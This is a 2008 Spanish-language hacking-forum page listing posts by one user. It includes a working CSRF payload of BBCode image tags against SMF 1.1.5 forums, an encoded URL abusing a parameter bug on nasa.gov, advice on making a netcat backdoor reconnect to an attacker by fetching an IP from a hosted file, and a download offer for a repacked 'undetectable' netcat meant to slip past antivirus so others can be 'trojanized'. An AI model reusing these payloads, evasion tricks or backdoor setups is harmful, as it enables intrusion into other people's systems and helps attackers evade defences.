Menú

Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - WHK

Páginas 1 ... 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 ... 456
#4271
Nivel Web / Re: XSRF en foros SMF => 1.1.5
23 Agosto 2008, 10:45 AM
Bueno, eso de ejecutar scripts atraves de imagenes es otro tema :P, claramente se podría tener tu ip ta,bién pero este no es el tema.

La falla solo puede hacer que el index se te vean todas las secciones colapsadas cada ves que veas la firma de alguien que tega ánimos de molestar.
#4272
Nivel Web / [°] CSRF en foros SMF => 1.1.5
23 Agosto 2008, 09:41 AM
Por un foro limpio y ordenado vivan los CSRF de SMF 1.1.5  :P

visualiza el index del foro.

Fuente:
http://www.jccharry.com/comunidad/index.php?board=8.0

Código [Seleccionar]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=1&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=2&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=4&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=6&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=9&url=http://foro.elhacker.net/[/img]
[img]http://www.jccharry.com/pruebas/smf1.0.5/1.jpg?colapsar=10&url=http://foro.elhacker.net/[/img]
#4273
Nivel Web / Bug en nasa.gov
17 Agosto 2008, 16:23 PM
http://www.nasa.gov/multimedia/nasatv/on_demand_video.html?param=%68%74%74%70%3A%2F%2F%77%77%77%2E%6A%63%63%68%61%72%72%79%2E%63%6F%6D%2F%70%72%75%65%62%61%73%2F%6E%61%73%61%2E%67%6F%76%2F%77%68%6B%2E%61%73%78

Que chulo está este bug  :P los parámetros del reproductor son remotos y no locales.

Fuente: http://www.jccharry.com/comunidad/index.php?topic=5.0
#4274
Nivel Web / Vulnerabilidad universal en foros y blogs (csrf)
20 Julio 2008, 03:59 AM
Bueno, he encontrado una falla que permitiría crear un post y no permitir que alguien pueda responder o que algún administrador/moderador pueda borrartelo.

Esta falla afecta a la mayoría de los sistemas en el cual puedes postear o crear usuarios en linea y no tan solo foros.

La explicación está acá:

Fuente:
http://foro.new-bytes.net/f28/vulnertabilidad-universal-en-foros-y-blogs-t344.html
#4275
Hacking / Re: Jugando con netcat
19 Julio 2008, 19:47 PM
Citar"no se encuentra el archivo"
Es porque no encuentra el archivo que puede ser el netcat... talves el ciber tuene antivirus y te lo borra.

Cklaro que puedes poner tu no-ip en ves de tu ip aunque te banearán dentro de no mucho ya que los admins de no-ip prohiben estas cosas.
Busca otras alternativas, como por ejemplo poner tu ip en un txt en un host y que el netcat lo descargue y se conecte a esa ip con un loop goto.
#4276
Programación Visual Basic / Re: HTTPS SSL con Winsock control
9 Julio 2008, 08:52 AM
Ya lo encontré, es un control que permite conexiones ssl igual que winsock pero llamado SSLSock.

Lo encontré en una página japonesa XD gracias google jajaja
#4277
Hacking / Re: Jugando con netcat
9 Julio 2008, 08:13 AM
Citar¿NOD32 detectaba como amenaza al netcat?. Pues yo uso NOD32 y siempre actualizado y al netcat no lo detecta. Yo uso cryptcat, y tampoco me lo detecta. Y en cuanto al método que uso para dejar indetectable un archivo es el que publicó octhal eliminando firmas (no así la heurística).

El nod32 toma al NetCat como Troyano Radmin al igual que cryptcat.

No dije que fuera 100% indetectable pero por lo menos va a sobrepasar a varios antivirus... el metodo de eliminar firmas al final te quedas sin archivo XD, el programa de e0n funcionaba bién pero no recoge argumentos.

Formas de hacerlo indetectable hay muchas, incluso creo que la mas optima es reconstruyendo el código fuente reemplazando variables y constantes y algunas funciones hacerlas trabajar de diferente manera pero con el mismo resultado, etc.

Al final si hablamos de eso mejor decimos que no es necesario utilizar netcat para troyanizar a alguien XD. Recuerda que esta sección es de Hacking Básico y si alguien quiere algo 100% indetectable que aprenda a programar sus propios troyanos en cpp o asm.

#4278
Hacking / Re: Jugando con netcat
9 Julio 2008, 06:49 AM
Un regalo para que sigan jugando con NetCat XD
Hice un nuevo NetCat que debería serf indetectable por muchos antivirus. Aunque hay mas formas de hacerlo solamente lo empaqueté en armadillo con certificado propio y sin mensaje de bienvenida.

Netcat Indetectable (No para el 100% de los av.)
http://descargas.jccharry.com/index.php?archivo=%2FBinarios%2FNetCat+indetectable.rar

Probado en Nod32.
#4279
Programación Visual Basic / HTTPS SSL con Winsock control
9 Julio 2008, 04:55 AM
Necesito manipular un sitio que trabaja solamente con https utilizando Sockets y no ieframe.

Alguien sabe algo del tema???

Por ahi leí algo sobre winsock 2.0 pero creo que es solo para .net y yo lo necesito para vb6.
#4280
PHP / Re: com insertar el ip al navegador
21 Junio 2008, 07:01 AM
Citarheader("Content-type: 1/jpeg");

Citarheader("Content-type: image/jpeg");


Para el SO no está relacionado un archivo "1"
Páginas 1 ... 413 414 415 416 417 418 419 420 421 422 423 424 425 426 427 428 429 430 431 432 433 434 435 436 437 438 439 440 441 442 443 ... 456